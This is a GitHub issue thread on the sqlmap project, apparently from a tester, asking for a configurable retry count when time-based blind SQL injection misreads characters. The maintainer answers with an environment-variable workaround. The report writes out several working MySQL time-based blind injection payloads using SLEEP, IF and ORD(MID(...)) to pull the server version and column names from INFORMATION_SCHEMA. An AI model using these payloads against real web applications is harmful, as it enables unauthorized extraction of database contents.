### ISSUE TITLE
please support to cotrole how many times of retrying to detect invalid character.

### ISSUE THREAD

**Issue by callmev2016** [sqlmapproject/sqlmap#4167]
**Is your feature request related to a problem? Please describe.**
There is a SQL injection vulnerability which the type is "time-based blind".The payload is 
	`id=') AND (SELECT 9980 FROM (SELECT(SLEEP(5)))MAhq) AND ('uggc'='uggc`
Something strange happened when i try to enumerate a table's columns, the payload is like:
```
AND (SELECT 6490 FROM (SELECT(SLEEP(6-(IF(ORD(MID((SELECT IFNULL(CAST(column
_name AS NCHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0xaaaa AND table_sc
hema=0xaaaa LIMIT 1,1),1,1))!=104,0,6)))))ZySV) AND ('uGhI'='uGhI
```

To simplify the payload, I will use "select @@version" to show the situation.

payload1: `AND (SELECT 6490 FROM (SELECT(SLEEP(6-(IF(ORD(MID(@@version,1,1))>54,0,6)))))ZySV)`
sleep time: 53ms
payload2: `AND (SELECT 6490 FROM (SELECT(SLEEP(6-(IF(ORD(MID(@@version,1,1))>52,0,6)))))ZySV)`
sleep time: 6.23s
payload3: `AND (SELECT 6490 FROM (SELECT(SLEEP(6-(IF(ORD(MID(@@version,1,1))=53,0,6)))))ZySV)`
sleep time: 12.27ms (@@version=5.1.3, so "ORD(MID(@@version,1,1))=53" is true.)
payload4: `AND (SELECT 6490 FROM (SELECT(SLEEP(6-(IF(ORD(MID(@@version,1,1))!=53,0,6)))))ZySV)`
sleep time: 6.12s
then sqlmap will trhow an error:[ERROR] invalid character detected. retrying..

the payload1/payload2 execute quite well, but the payload3 sleep duble time, and the strangest thing is payload4 **sleep 6.12s  too!!** 

The problem is, payload3 has detected the right character, but payload4 confused sqlmap. So sqlmap will retrying to detect the character again, and agian, 6 times! you known the time is  precious for a "time-based blind" vulnerability.

BTW,payload5: `AND (SELECT 6490 FROM (SELECT(SLEEP(6-(IF(ORD(MID(@@version,1,1))!=52,0,6)))))ZySV)`
sleep time: 6.2s
It's quite right.

**Describe the solution you'd like**
I really don't know why this happend. This has happened several times in recent months. My suggestion is to add a parameter to control how many times sqlmap will retry to detect the invalid character.

**Describe alternatives you've considered**
sqlmap can retry to detect the invalid character only one or twice by default.

**Additional context**

**Comment by stamparm** [comment]
1) There were no similar requests till now. Thus, as there is a workaround, I'll skip the incorporation of one more switch/option. First, please update to the latest revision as otherwise it won't work as expected.
2) That number of revalidations is currently hard-coded inside the sqlmap (setting `MAX_REVALIDATION_STEPS` is set to a value `5`), but you can dynamically change it as follows:
```
export SQLMAP__MAX_REVALIDATION_STEPS=100
python sqlmap.py ...
```

If you are a Windows user, you'll need to set the environment variable `SQLMAP__MAX_REVALIDATION_STEPS` (inside System settings) to an arbitrary value
